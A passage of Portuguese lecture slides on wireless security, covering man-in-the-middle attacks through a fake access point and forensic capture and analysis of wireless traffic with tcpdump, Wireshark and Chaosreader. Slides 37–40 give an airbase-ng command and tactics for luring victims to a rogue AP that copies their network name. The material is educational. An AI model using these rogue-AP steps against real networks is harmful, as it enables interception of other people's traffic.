  • 36. Man-in-the-Middle ● MITM Ativo ○ Por que funciona? ■ Falta de informação do cliente
  • 37. Man-in-the-Middle ● Fake AP ○ Criar um AP falso pra enganar a vítima ○ Honeypot ○ Cuidado com as redes preferenciais
  • 38. Man-in-the-Middle ● Fake AP (Honeypot) ○ Atrair a vítima para o AP falso ○ Criar uma rede falsa com: 1. Mesmo ESSID que a vítima está associada 2. ESSID com um nome falso (ex: aeroporto, café, …)
  • 39. Man-in-the-Middle ● Fake AP (Honeypot) ○ Rastrear clientes com airodump-ng ○ Criar o AP falso com airbase-ng #: airbase-ng --essid <nome do AP> -c <canal> mon0
  • 40. Man-in-the-Middle ● Fake AP (Honeypot) ○ “Chamar” o cliente ○ Ou aumenta o seu sinal… ○ ...ou diminui o dele (?)
  • 42. Análise Forense em Redes de Computadores sem fio
  • 43. Conceitos ● Perícia forense: ”suporte técnico ao judiciário, realizado por pessoas capacitadas, para responder a quesitos aos quais o judiciário não dispõe de embasamento suficiente para julgar com precisão”
  • 44. Conceitos ● Computação forense: ”área da computação responsável por dar resposta ao judiciário em questões envolvendo sistemas computacionais”
  • 45. Conceitos ● Forense em redes: ”captura, armazenamento, manipulação e análise de dados que trafegam (ou trafegaram) em redes de computadores como parte de um processo investigativo”
  • 46. Grampo digital ● Investigação através de um grampo digital ● Fases: ○ Instalação do grampo ○ Captura de dados ○ Análise de dados
  • 47. Instalação do grampo ● Procedimento físico: identificar ponto de captura, técnica utilizada ● Técnicas ○ Monitorar portas ○ Interceptar dados
  • 48. ● Através de portas de monitoramento Instalação do grampo A B C D mensagem de A para B B recebe Sniffer instalado D recebe todo tráfego de/para A
  • 49. ● Através de interceptação intermediária Instalação do grampo A B C mensagem de A para B B recebe Sniffer instalado D recebe todo tráfego de/para A D
  • 50. Instalação do grampo ● Grampo: host associado à rede ● Se não estiver associado ○ Captura em modo monitor ○ Quebra a chave
  • 51. Captura de dados ● Procedimento lógico: escolha de software, parâmetros de captura, filtros ● Filtrar dados ○ Wireshark? ○ tcpdump
  • 52. Captura de dados ● Filtros no tcpdump ○ Por host ○ De um host para outro #: tcpdump -X -vvv -n -i wlan0 -s0 host <IP> [ and host <IP>] #: tcpdump -X -vvv -n -i wlan0 -s0 src host <IP> and dst host <IP>
  • 53. Captura de dados ● Filtros no tcpdump ○ Por porta ○ Gravando em arquivo #: tcpdump -X -vvv -n -i wlan0 -s0 port <porta> [ and port <porta>] #: tcpdump -X -vvv -n -i wlan0 -w <arquivo>
  • 54. Análise de dados ● Identificar conteúdo capturado ● Responder ao judiciário ● Técnicas ○ Casamento de padrões ○ Campos do protocolo ○ Filtragem
  • 55. Análise de dados ● Wireshark ○ Boa interface ○ Vários recursos ○ Exportação de pacotes (Follow TCP Stream) ● Chaosreader ○ Reconstrói sessão no formato HTML
  • 57. Análise de dados ● Wireshark ○ Follow TCP Stream: ■ Baseado em protocolos TCP ■ Mostra sequência do tráfego ■ Exportação de dados
  • 58. Análise de dados ● Chaosreader ○ Alguns screenshots: http://www.brendangregg. com/chaosreader.html
  • 59. Conclusões ● Vulnerabilidades existem ● Conhecer como se ataca para se defender ● Área forense
  • 60. Referências ● Ramashadran, Vivek. BackTrack 5 Wireless Penetration Test: Beginner’s Guide. Packt Publishing, 2011. ● Kléber, Ricardo. Introdução à Análise Forense em Redes de Computadores: conceitos, técnicase ferramentas para “grampos digitais”. Novatec, 2013.